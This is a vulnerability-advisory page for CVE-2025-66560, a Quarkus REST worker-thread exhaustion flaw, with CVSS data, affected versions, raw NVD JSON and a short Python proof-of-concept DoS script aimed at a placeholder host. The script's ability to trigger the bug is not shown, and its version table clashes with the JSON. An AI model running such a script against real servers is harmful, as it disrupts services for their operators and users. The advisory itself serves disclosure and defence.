Security Vulnerability Report
中文
CVE-2025-66560 CVSS 5.9 MEDIUM

CVE-2025-66560

Published: 2026-01-07 18:15:52
Last Modified: 2026-02-03 16:40:29
Source: [email protected]

Description

Quarkus is a Cloud Native, (Linux) Container First framework for writing Java applications. Prior to versions 3.31.0, 3.27.2, and 3.20.5, a vulnerability exists in the HTTP layer of Quarkus REST related to response handling. When a response is being written, the framework waits for previously written response chunks to be fully transmitted before proceeding. If the client connection is dropped during this waiting period, the associated worker thread is never released and becomes permanently blocked. Under sustained or repeated occurrences, this can exhaust the available worker threads, leading to degraded performance, or complete unavailability of the application. This issue has been patched in versions 3.31.0, 3.27.2, and 3.20.5. A workaround involves implementing a health check that monitors the status and saturation of the worker thread pool to detect abnormal thread retention early.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:* - VULNERABLE
Quarkus REST < 3.20.5
Quarkus REST 3.21.x - 3.27.1
Quarkus REST 3.28.x - 3.30.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import time import threading # PoC for CVE-2025-66560 - Quarkus REST Thread Exhaustion DoS # This script demonstrates how rapid connection drops can exhaust worker threads TARGET_HOST = 'target-server.example.com' TARGET_PORT = 8080 NUM_CONNECTIONS = 50 # Number of rapid connections to make DELAY = 0.01 # Delay between connections in seconds def attack_connection(): """Establish a connection and drop it immediately to trigger thread blocking""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((TARGET_HOST, TARGET_PORT)) # Send partial HTTP request sock.sendall(b'GET /api HTTP/1.1\r\nHost: ' + TARGET_HOST.encode() + b'\r\n\r\n') # Immediately close connection before response is sent sock.close() except Exception as e: pass def run_poc(): print(f"[*] Starting DoS attack against {TARGET_HOST}:{TARGET_PORT}") print(f"[*] Launching {NUM_CONNECTIONS} rapid connections...") threads = [] for i in range(NUM_CONNECTIONS): t = threading.Thread(target=attack_connection) t.start() threads.append(t) time.sleep(DELAY) for t in threads: t.join() print("[*] Attack completed. Check server thread pool status.") if __name__ == '__main__': run_poc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66560", "sourceIdentifier": "[email protected]", "published": "2026-01-07T18:15:52.023", "lastModified": "2026-02-03T16:40:28.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quarkus is a Cloud Native, (Linux) Container First framework for writing Java applications. Prior to versions 3.31.0, 3.27.2, and 3.20.5, a vulnerability exists in the HTTP layer of Quarkus REST related to response handling. When a response is being written, the framework waits for previously written response chunks to be fully transmitted before proceeding. If the client connection is dropped during this waiting period, the associated worker thread is never released and becomes permanently blocked. Under sustained or repeated occurrences, this can exhaust the available worker threads, leading to degraded performance, or complete unavailability of the application. This issue has been patched in versions 3.31.0, 3.27.2, and 3.20.5. A workaround involves implementing a health check that monitors the status and saturation of the worker thread pool to detect abnormal thread retention early."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.20.5", "matchCriteriaId": "015CA670-5F52-45CF-B627-3267A1C646DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.21.0", "versionEndExcluding": "3.27.2", "matchCriteriaId": "3691AA3B-570C-4770-B8AE-E97B6A3CFF35"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.30.0", "versionEndExcluding": "3.31.0", "matchCriteriaId": "32AFDCC2-2866-4586-AC70-97200C850B4B"}]}]}], "references": [{"url": "https://github.com/quarkusio/quarkus/security/advisories/GHSA-5rfx-cp42-p624", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.